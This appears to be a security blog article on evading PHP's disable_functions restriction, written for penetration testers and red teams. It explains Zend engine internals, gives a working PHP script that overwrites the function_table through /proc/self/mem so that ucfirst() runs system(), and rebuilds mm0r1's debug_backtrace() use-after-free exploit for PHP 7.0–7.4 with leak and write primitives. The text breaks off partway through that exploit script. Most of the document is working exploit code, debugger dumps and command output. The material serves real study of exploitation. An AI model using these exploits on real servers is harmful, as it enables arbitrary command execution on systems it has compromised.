Views: 79
0 0
Read Time:35 Minute, 7 Second

When performing an intrusion test, or a Red Team operation, multiple tools (webshells, proxysocks to tunnel TCP traffic on HTTP and pivot, etc.) tend to be deployed on compromised web servers as custom scripts. In some cases these servers may be more or less bastioned, making somewhat difficult to compromise them. One of the most common configurations that can be found in PHP environments is the use of disable_functions to restrict what functions can be used in PHP scripts, to avoid using “dangerous” ones such as system()passthru(), etc. In this article we will take an in-depth look at how this PHP directive works and how to circumvent it.

In summary, this article aims to shed light on the following topics:

  • Explanation of some PHP internals
  • Automation of the search for evasion techniques not based on memory corruption
  • Searching for vulnerabilities through fuzzing
  • Description of exploitation techniques

A gentle flight over PHP internals and disable_functions

Before we dive into explaining how to find vulnerabilities, and how to exploit them, first it is necessary to understand some basic concepts of how PHP works internally. In the following sections we will go deeper into certain topics, but for now let’s see how some key aspects work. First of all: functions.

In PHP we find 3 main types of functions: internal functions, which are the standard functions provided by PHP and its installed extensions (e.g. base64_decode()), and which are compiled; user-defined functions which are those created in the running script itself (e.g. function minorthreat() {...}); and finally, anonymous functions or closures, which are functions created in the script and which do not have a defined name (e.g. $name = function ($band) { printf ("Listen %s!\n", $band); }).

Internal functions are usually declared using macros such as PHP_FUNCTIONPHP_NAMED_FUNCTION, etc. and the parameters they receive are also defined with other macros: ZEND_PARSE_PARAMETERS_START and ZEND_PARSE_PARAMETERS_END. For example, the source code for base64_decode[1] is as follows:

PHP_FUNCTION(base64_decode)
{
char *str;
zend_bool strict = 0;
size_t str_len;
zend_string *result;
ZEND_PARSE_PARAMETERS_START(1, 2)
Z_PARAM_STRING(str, str_len)
Z_PARAM_OPTIONAL
Z_PARAM_BOOL(strict)
ZEND_PARSE_PARAMETERS_END();
result = php_base64_decode_ex((unsigned char*)str, str_len, strict);
if (result != NULL) {
RETURN_STR(result);
} else {
RETURN_FALSE;
}

Looking at the source code it can be seen how the parameters that this function receives are defined, in turn, by other macros depending on the type. In this case the function expects a mandatory string parameter and an optional boolean one. Once the code is compiled these functions will appear in the symbols preceded by the prefix zif_, which is the acronym of “Zend Iinternal Function”:

ᐓ objdump -t /usr/local/bin/php | grep "zif_" | tail
0000000000f65e80 g F .text 00000000000023e3 zif_fgets
0000000000f6be70 g F .text 00000000000018c0 zif_fwrite
0000000000f69150 g F .text 0000000000001cca zif_fgetss
0000000000f7f5f0 g F .text 0000000000001564 zif_fread
00000000015a10c0 g F .text 0000000000000031 zif_display_disabled_function
0000000000f6e130 g F .text 00000000000009f3 zif_rewind
0000000000f6eb30 g F .text 0000000000000a3a zif_ftell
0000000000f6f570 g F .text 0000000000001428 zif_fseek
0000000000f35160 g F .text 0000000000000c4e zif_dl
0000000000f6d730 g F .text 00000000000009f5 zif_fflush

Internal functions are registered in the Zend engine using the zend_function_entry structure, which is defined as follows:

typedef struct _zend_function_entry {
const char *fname;
void (*handler)(INTERNAL_FUNCTION_PARAMETERS);
const struct _zend_internal_arg_info *arg_info;
uint32_t num_args;
uint32_t flags;
} zend_function_entry;

The first two members stand out in this structure, as they hold the function name and its handler (that is to say, in the case of the function str(), we will have the first member pointing to the str string and the second one to the zif_str function). The “basic” functions are grouped into basic_functions for registration, this being an array of zend_function_entry[2] structures. Therefore, in this basic_functions we will have, ultimately, an ordered relationship of function names along with the pointer to them (handlers).

Both internal and user-defined functions are registered into the Zend engine using a HashTable called function_table. Whenever a PHP script makes a function call, the handler of the function is searched for in this HashTable. This is where the disable_functions directive will act.

This directive marks the application of the function zend_disable_function over those in the function_table for which it has been defined.

ZEND_API int zend_disable_function(char *function_name, size_t function_name_length)
{
zend_internal_function *func;
if ((func = zend_hash_str_find_ptr(CG(function_table), function_name, function_name_length))) {
zend_free_internal_arg_info(func);
func->fn_flags &= ~(ZEND_ACC_VARIADIC | ZEND_ACC_HAS_TYPE_HINTS | ZEND_ACC_HAS_RETURN_TYPE);
func->num_args = 0;
func->arg_info = NULL;
func->handler = ZEND_FN(display_disabled_function);
return SUCCESS;
}
return FAILURE;
}

As can be seen in the code, zend_disable_function searches the HashTable for the target function and changes the original handler to the display_disabled_function:

ZEND_API ZEND_COLD ZEND_FUNCTION(display_disabled_function)
{
zend_error(E_WARNING, "%s() has been disabled for security reasons", get_active_function_name());
}

Therefore, when a disabled function is called from a PHP script, instead of the original function being executed, the function showing the error message will be executed. That is, disable_functions only affects the function_table: if the original handler is found, its effect can be reversed by patching the function_table or by calling the function directly. We will dive into these concepts in more detail below.

Learning by practice: sparring with php-cli and selfpatching /proc/self/mem

To put all the concepts we have just seen in the previous section together, and aiming to be able to exploit vulnerabilities later on, let’s see how we should work with the process memory to perform the disable_functions evasion. All the steps that we are going to do here should be done using primitives of arbitrary reading and writing when developing an exploit (for example, heap or binary addresses should be leaked). It goes without saying that this technique should not work against any modern web server (although it is true that this technique has been used in the past[3], so php-cli is just our sparring training before jumping into a real exploit. If at the end of this section you have understood everything, you are on the right path.

Note: for this section we are using PHP 7.3 installed on Debian 10 using apt-get install (PHP 7.3.14-1~deb10u1 (cli) (built: Feb 16 2020 15:07:23) ( NTS ))

Our road map is quite simple:

  1. Locate the addresses where the binary and heap sections are mapped.
  2. Find handlers in the code for zif_system and another function that receives a string parameter (such as zif_ucfirst).
  3. Locate the function_table in the heap and replace the function handler in the entry for ucfirst() with the one of zif_system.
  4. Call ucfirst() using a system command as parameter (as you would do with system()).

For the first step we can directly parse the entries at /proc/self/maps (in the next section we will see how this information would be obtained in a real exploit). A rough approximation could be the following:

function memmaps() {
print "[+] Parsing mapped memory regions:\n";
$targets = Array();
$raw_map = explode(PHP_EOL,file_get_contents("/proc/self/maps"));
$check = 0;
foreach ($raw_map as $line) {
if (substr($line,-7) == "/php7.3" && $check == 0) {
if (strpos($line, "r--p") !== false) {
$range = explode(" ", $line);
$split_range = explode("-", $range[0]);
$targets["bin_start"] = hexdec($split_range[0]);
$targets["bin_end"] = hexdec($split_range[1]);
$check = 1;
}
}
if (substr($line, -6) == "[heap]") {
$range = explode(" ", $line);
$split_range = explode("-", $range[0]);
$targets["heap_start"] = hexdec($split_range[0]);
$targets["heap_end"] = hexdec($split_range[1]);
}
}
print "\t[-] Binary: 0x" . dechex($targets["bin_start"]) . "-0x" . dechex($targets["bin_end"]) . "\n";
print "\t[-] Heap: 0x" . dechex($targets["heap_start"]) . "-0x" . dechex($targets["heap_end"]) . "\n";
return $targets;
}

We will also need a couple of auxiliary functions to be able to work with “raw” process memory. We will use a combination of fseek() and fread() to perform arbitrary readings at the desired memory addresses:

function getdata($fd, $address, $size) {
fseek($fd, $address);
$data = fread($fd, $size);
return $data;
}
function trans1($value) {
return hexdec(bin2hex(strrev($value)));
}
function trans2($value) {
return strrev(hex2bin(dechex($value)));
}

Having extracted the base address (using our previously declared memmaps()), the ELF header can be parsed to obtain information of the memory range where to look for the basic_functions array:

function parse_elf($base) { // https://wiki.osdev.org/ELF_Tutorial
$parsed = Array();
$fd = fopen("/proc/self/mem", "rb");
$parsed["type"] = getdata($fd, $base + 0x10, 1);
$parsed["phoff"] = getdata($fd, $base + 0x20, 8);
$parsed["phentsize"] = getdata($fd, $base + 0x36, 2);
$parsed["phnum"] = getdata($fd, $base + 0x38, 2);
for ($i = 0; $i < trans1($parsed["phnum"]); $i++) {
$header = $base + trans1($parsed["phoff"]) + $i * trans1($parsed["phentsize"]);
$parsed["ptype"] = getdata($fd, $header, 4);
$parsed["pflags"] = getdata($fd, $header + 0x4, 4);
$parsed["pvaddr"] = getdata($fd, $header + 0x10, 8);
$parsed["pmemsz"] = getdata($fd, $header + 0x28, 8);
if (trans1($parsed["ptype"]) == 1 && trans1($parsed["pflags"]) == 6) {
$parsed["data_addr"] = trans1($parsed["type"]) == 2 ? trans1($parsed["pvaddr"]) : $base + trans1($parsed["pvaddr"]);
$parsed["data_size"] = trans1($parsed["pmemsz"]);
} else if (trans1($parsed["ptype"]) == 1 && trans1($parsed["pflags"]) == 5) {
$parsed["text_size"] = trans1($parsed["pmemsz"]);
}
}
return $parsed;
}

In the previous section we saw that this array is composed of zend_function_entry structures, and that the first two members are pointers to the function name and handler. Therefore, if we want to locate the pointers to zif_ucfirst and zif_system, we can sequentially extract 8-byte blocks and use these values as addresses to read 8 bytes from (in case they are valid memory addresses). If these bytes correspond to the function name, it will mean that the position where that memory address was found corresponds to the *fname field of the zend_function_entry structure, and therefore the field containing the target handler will be 8 bytes later.

Looking for handlers

This same procedure would be used to locate the entry of the function escapeshellcmd() (our zif_system is at a distance of 0x20 from it[4]):

function get_handlers($base, $data_addr, $text_size, $data_size) {
print "[+] Searching for handlers in basic_functions:\n";
$handlers = Array();
$fd = fopen("/proc/self/mem", "rb");
for ($i = 0; $i < $data_size / 8; $i++) {
$test = trans1(getdata($fd, $data_addr + $i * 0x8, 8));
if ($test - $base > 0 && $test - $base < $data_addr - $base) {
$fname = getdata($fd, $test, 8);
if (trans1($fname) == 0x74737269666375) { // ucfirst() ==> python -c 'a = "ucfirst"; print "0x" + a[::-1].encode("hex")'
$handlers["ucfirst"] = trans1(getdata($fd, $data_addr + $i * 0x8 + 8, 8));
print "\t[-] zif_ucfirst found at 0x" . dechex($handlers["ucfirst"]) . "\n";
continue;
} else if (trans1($fname) == 0x6873657061637365) { // escapeshellcmd() ==> python -c 'a = "escapesh"; print "0x" + a[::-1].encode("hex")'
$handlers["system"] = trans1(getdata($fd, $data_addr + $i * 0x8 + 8 - 0x20, 8));
print "\t[-] zif_system found at 0x" . dechex($handlers["system"]) . "\n";
return $handlers;
}
}
}
}

At this point we know the location of zif_ucfirst, so all that remains is to scan the heap for this address (it will be found in the function_table) and replace it with zif_system:

function scan_and_patch($base, $final, $old, $new) {
print "[+] Scanning the heap to locate the function_table\n";
$fd = fopen("/proc/self/mem", "r+b");
for ($i = 0; $i < ($final - $base) / 8; $i++) {
$test = trans1(getdata($fd, $base + $i * 0x8, 8));
if ($test == $old) {
print "\t[-] zif_ucfirst referenced at 0x" . dechex($base + $i * 0x8) ."\n";
fseek($fd, $base + $i * 0x8);
print "[+] Patching ucfirst() with zif_system handler\n";
fwrite($fd,trans2($new));
return;
}
}
}

After modifying the function_table in this way, when calling ucfirst()system() will be actually invoked.

ᐓ php7.3 -d "disable_functions=system" disable_functions_PoC.php
-=[ Bypassing disable_functions when open_basedir is misconfigured (PoC by @TheXC3LL) ]=-
[+] Parsing mapped memory regions:
[-] Binary: 0x563eafc2e000-0x563eafd08000
[-] Heap: 0x563eb1123000-0x563eb12a3000
[+] Searching for handlers in basic_functions:
[-] zif_ucfirst found at 0x563eafe44220
[-] zif_system found at 0x563eafe15b50
[+] Scanning the heap to locate the function_table
[-] zif_ucfirst referenced at 0x563eb1173c70
[+] Patching ucfirst() with zif_system handler
[+] Calling ucfirst('uname -a')...
Linux insulaservus 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

If all the concepts explained so far are clear, we can start battling with real vulnerabilities to create our exploits.

A flyweight combat: debug_backtrace() exploit (UAF)

Each vulnerability has its own peculiarities, and its exploitation can greatly differ from one to another. Likewise, the difficulty and problems to be solved are different in each case. Nevertheless, in this section we are going to analyze and exploit a quite simple vulnerability, but which will allow us to put into practice different concepts seen in previous sections. We will analyze and rebuild a use-after-free exploit of mm0r1 in debug_backtrace()[5].

Note: in this section we will use PHP 7.2.11 compiled with symbols and without optimizations. PHP 7.2.11 (cli) (built: Mar 4 2020 15:11:35) ( NTS )

./configure CFLAGS="-O0 -g"
make -j$(nproc)
sudo make install

The script exploits a vulnerability reported years ago[6]. A small example in the bugtracker thread triggers the problem:

<?php
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
trigger_uaf('x');
?>

We can identify the existence of a use-after-free (UAF) using valgrind[7] (run export USE_ZEND_ALLOC=0 prior to it):

==60628== Invalid write of size 4
==60628== at 0x788F78: zval_addref_p (zend_types.h:892)
==60628== by 0x788F78: debug_backtrace_get_args (zend_builtin_functions.c:2157)
==60628== by 0x78A6AF: zend_fetch_debug_backtrace (zend_builtin_functions.c:2550)
==60628== by 0x792478: zend_default_exception_new_ex (zend_exceptions.c:216)
==60628== by 0x7927E0: zend_default_exception_new (zend_exceptions.c:244)
==60628== by 0x7566CE: _object_and_properties_init (zend_API.c:1332)
==60628== by 0x756712: _object_init_ex (zend_API.c:1340)
==60628== by 0x7F4D9E: ZEND_NEW_SPEC_CONST_HANDLER (zend_vm_execute.h:3231)
==60628== by 0x8EEEFB: execute_ex (zend_vm_execute.h:59945)
==60628== by 0x72F9A4: zend_call_function (zend_execute_API.c:820)
==60628== by 0x78FA01: zend_call_method (zend_interfaces.c:100)
==60628== by 0x7C4140: zend_objects_destroy_object (zend_objects.c:146)
==60628== by 0x7CD40D: zend_objects_store_del (zend_objects_API.c:173)
==60628== Address 0x737adc0 is 0 bytes inside a block of size 104 free'd
==60628== at 0x48369AB: free (vg_replace_malloc.c:530)
==60628== by 0x70A0AE: _efree (zend_alloc.c:2444)
==60628== by 0x74AEB5: zend_string_free (zend_string.h:283)
==60628== by 0x74AEB5: _zval_dtor_func (zend_variables.c:38)
==60628== by 0x72DAD6: i_zval_ptr_dtor (zend_variables.h:49)
==60628== by 0x72DAD6: _zval_ptr_dtor (zend_execute_API.c:533)
==60628== by 0x7C9D8C: zend_std_unset_property (zend_object_handlers.c:976)
==60628== by 0x86B3D6: ZEND_UNSET_OBJ_SPEC_UNUSED_CONST_HANDLER (zend_vm_execute.h:28570)
==60628== by 0x8F5B05: execute_ex (zend_vm_execute.h:61688)
==60628== by 0x72F9A4: zend_call_function (zend_execute_API.c:820)
==60628== by 0x78FA01: zend_call_method (zend_interfaces.c:100)
==60628== by 0x7C4140: zend_objects_destroy_object (zend_objects.c:146)
==60628== by 0x7CD40D: zend_objects_store_del (zend_objects_API.c:173)
==60628== by 0x74AF10: _zval_dtor_func (zend_variables.c:56)
==60628== Block was alloc'd at
==60628== at 0x483577F: malloc (vg_replace_malloc.c:299)
==60628== by 0x70AF88: __zend_malloc (zend_alloc.c:2829)
==60628== by 0x709E47: _emalloc (zend_alloc.c:2429)
==60628== by 0x62ABAC: zend_string_alloc (zend_string.h:134)
==60628== by 0x62ABAC: zend_string_init (zend_string.h:170)
==60628== by 0x62ABAC: zif_str_shuffle (string.c:5489)
==60628== by 0x8E91EE: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:617)
==60628== by 0x8E91EE: execute_ex (zend_vm_execute.h:59750)
==60628== by 0x900092: zend_execute (zend_vm_execute.h:63776)
==60628== by 0x750AE8: zend_execute_scripts (zend.c:1496)
==60628== by 0x69FC9C: php_execute_script (main.c:2590)
==60628== by 0x903608: do_cli (php_cli.c:1011)
==60628== by 0x9047D8: main (php_cli.c:1404)

Confirming the exploitability of this vulnerability is trivial:

<?php
function pwn() {
global $canary, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 60));
$vuln = new Vuln();
$vuln->a = $arg;
}
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 60));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$dummy = str_shuffle(str_repeat('B', 60));
print $canary; // It will print BBB...BBBB
}
pwn();
?>

We showed how when printing the variable canary we actually got the content of dummy in the previous example. If instead of using a string to fill the gap left we use an object, we should be able to see its representation in memory:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a;
}
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->a = function ($x) {};
print $canary;
}
pwn();
?>

However, we see a regular string:

ᐓ /usr/local/bin/php uaf.php
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If instead of using print we use debug_zval_dump, we can see how the refcount field holds a wrong value:

ᐓ /usr/local/bin/php uaf.php
string(79) "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" refcount(3979578963)

In PHP 7 strings are represented using the structure zend_string[8]. This structure stores the string as a group of char instead of a pointer[9]:

struct _zend_string {
zend_refcounted_h gc;
zend_ulong h;
size_t len;
char val[1]; // NOT A "char *"
};

In turn, variables in the Zend engine are called ‘zval’, and their value is contained in the following structure[10]:

typedef union _zend_value {
zend_long lval;
double dval;
zend_refcounted *counted;
zend_string *str;
zend_array *arr;
zend_object *obj;
zend_resource *res;
zend_reference *ref;
zend_ast_ref *ast;
zval *zv;
void *ptr;
zend_class_entry *ce;
zend_function *func;
struct {
uint32_t w1;
uint32_t w2;
} ww;
} zend_value;

Knowing all this information, and fixing the object sizes (number of properties), we can get leaked memory in a string:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$address = $canary[0].$canary[1].$canary[2].$canary[3].$canary[4].$canary[5].$canary[6].$canary[7];
print "0x" . bin2hex(strrev($address));
var_dump();
}
pwn();
?>

We execute:

ᐓ /usr/local/bin/php uaf.php
0x00005555564ac2a0

And we can check that this value corresponds to the memory address of std_object_handlers[12]:

pwndbg> x/x 0x00005555564ac2a0
0x5555564ac2a0 <std_object_handlers>: 0x00000000

Right now we have arbitrary relative reading and writing (interpreting our $canary as a string we can access bytes as if it were an array with $canary[x]), and we need to achieve absolute arbitrary reading (that is, to be able to read the content of any valid memory address). We can use one of the $helper object properties for this. Let’s put a breakpoint in var_dump() and proceed with the following example:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$helper->a = "KKKK";
var_dump($helper->a);
}
pwn();
?>

Inspecting the memory, we get the following:

pwndbg> x/g args
0x555556637fb8: 0x0000555556638d00
pwndbg> x/40x 0x0000555556638d00
0x555556638d00: 0xc001800800000001 0x0000000000000001
0x555556638d10: 0x00005555566169f0 0x00005555564ac2a0
0x555556638d20: 0x0000000000000000 0x0000555556635d10 <--- Pointer to zend_string
0x555556638d30: 0x4141414100000006 0x000055555660c490
0x555556638d40: 0x4141414100000408 0x0000000000000020
0x555556638d50: 0x4141414100000001 0x0000000000000020
0x555556638d60: 0x0041414100000001 0x0000000000000021
0x555556638d70: 0x0000555556616fe8 0x0000000000000000
0x555556638d80: 0x0000000000000000 0x0000000000000021
0x555556638d90: 0x00000008000000c0 0x00007fff0000000c
0x555556638da0: 0x0000000000000000 0x0000000000000041
0x555556638db0: 0x0000800700000002 0xfffffffe00000012
0x555556638dc0: 0x00005555563582c0 0x0000000000000000
0x555556638dd0: 0xffffffff00000008 0x0000000000000000
0x555556638de0: 0x0000555555b79a7d 0x0000000000000031
0x555556638df0: 0x0000000000000000 0x00005555564e2010
0x555556638e00: 0x0000000000000006 0x00007265706c6568
0x555556638e10: 0x0000000000000000 0x0000000000000021
0x555556638e20: 0x00007fff00000002 0x00007ffff7c05ca0
0x555556638e30: 0x0000000000000000 0x0000000000000051

We can see that 0x00005556635d10 is the pointer to the zend_string structure containing the “KKKK” string:

pwndbg> x/4g 0x0000555556635d10
0x555556635d10: 0x0000020600000000 0x800000017c8778f1
0x555556635d20: 0x0000000000000004 0x000000004b4b4b4b <-- "KKKK"

Or, inspecting it as a structure:

pwndbg> print (zend_string) *0x0000555556635d10
$42 = {
gc = {
refcount = 0,
u = {
v = {
type = 6 '\006',
flags = 2 '\002',
gc_info = 0
},
type_info = 518
}
},
h = 9223372043238996209,
len = 4,
val = "K"
}

If, with our relative writing, we change the zend_string structure pointer so that it points to a different valid memory address, we will be able to leak its contents. Let’s try changing that pointer to one taken from the debugger for testing:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for ($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for ($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$php_heap = str2ptr($canary, 0x58);
$canary_addr = $php_heap - 0xc8;
write($canary, 0x60, 2);
write($canary, 0x70, 6);
write($canary, 0x10, hexdec("555556616f80")); // Random valid address to use as test
write($canary, 0x18, 0xa);
var_dump($helper->a);
}
pwn();
?>

Indeed, it now points to the address we have indicated:

pwndbg> x/40x 0x0000555556638e20
0x555556638e20: 0xc001800800000001 0x0000000000000000
0x555556638e30: 0x00005555566169f0 0x00005555564ac2a0
0x555556638e40: 0x0000000000000000 0x0000555556616f80 <-- Pointer used as test
0x555556638e50: 0x000000000000000a 0x00005555566364e0
0x555556638e60: 0x4141414100000408 0x0000000000000020
0x555556638e70: 0x4141414100000001 0x0000000000000020
0x555556638e80: 0x0041414100000001 0x0000000000000021
0x555556638e90: 0x0000555556616fe8 0x0000000000000002
0x555556638ea0: 0x0000000000000000 0x0000000000000006
0x555556638eb0: 0x00000008000000c0 0x00007fff0000000c
0x555556638ec0: 0x0000000000000000 0x0000000000000041
0x555556638ed0: 0x0000800700000002 0xfffffffe00000012
0x555556638ee0: 0x00005555563582c0 0x0000000000000000
0x555556638ef0: 0xffffffff00000008 0x0000000000000000
0x555556638f00: 0x0000555555b79a7d 0x0000000000000031
0x555556638f10: 0x0000000000000000 0x00005555564e2010
0x555556638f20: 0x0000000000000006 0x00007265706c6568
0x555556638f30: 0x0000000000000000 0x0000000000000021
0x555556638f40: 0x00007fff00000002 0x00007ffff7c05ca0
0x555556638f50: 0x0000000000000000 0x0000000000000051

As it is being interpreted as a zend_string, this memory area will leak information. We can, for example, make a strlen($helper->a):

pwndbg> x/4g 0x0000555556616f80
0x555556616f80: 0x000055555662c04f 0x0000003d0000003d
0x555556616f90: 0x0000000000000000 0x00000001ffffffff
pwndbg> print (zend_string) *0x0000555556616f80
$43 = {
gc = {
refcount = 1449312335,
u = {
v = {
type = 85 'U',
flags = 85 'U',
gc_info = 0
},
type_info = 21845
}
},
h = 261993005117,
len = 8589934591, <--- 0x00000001ffffffff
val = "\377"
}

With this ability to leak arbitrary content, it is possible to repeat the same procedure followed in the previous section in order to identify the zif_system handler. Instead of patching an internal function handler in the function_table, we choose to reuse the anonymous function created ($helper->b()). Anonymous functions or closures have the following structure:

typedef struct _zend_closure {
zend_object std;
zend_function func;
zval this_ptr;
zend_class_entry *called_scope;
zif_handler orig_internal_handler;
} zend_closure;

Within the func field (which is a zend_function), we find a zend_internal_function structure [13]:

typedef struct _zend_internal_function {
/* Common elements */
zend_uchar type;
zend_uchar arg_flags[3]; /* bitset of arg_info.pass_by_reference */
uint32_t fn_flags;
zend_string* function_name;
zend_class_entry *scope;
zend_function *prototype;
uint32_t num_args;
uint32_t required_num_args;
zend_internal_arg_info *arg_info;
/* END of common elements */
zif_handler handler;
struct _zend_module_entry *module;
void *reserved[ZEND_MAX_RESERVED_RESOURCES];
} zend_internal_function;

Which looks like the following on gdb:

$3 = {
type = 2 '\002',
arg_flags = "\000\000",
fn_flags = 135266304,
function_name = 0x7ffff3801d70,
scope = 0x0,
prototype = 0x7ffff38652c0,
num_args = 1,
required_num_args = 1,
arg_info = 0x7ffff387c0f0,
handler = 0x7ffff3879068,
module = 0x2,
reserved = {0x7ffff3873280, 0x1, 0x7ffff3879070, 0x0, 0x0, 0x0}
}

By overwriting the field handler with the one of zif_system (and modifying the field type to 1 to mark it as an internal function and not a user-defined one), the system function would be called. mm0r1’s complete exploit looks like this:

<?php
# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for ($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for ($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for ($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if ($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if ($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if (!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for ($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if ($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if ($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for ($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if ($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if ($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while ($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if (strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);
# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
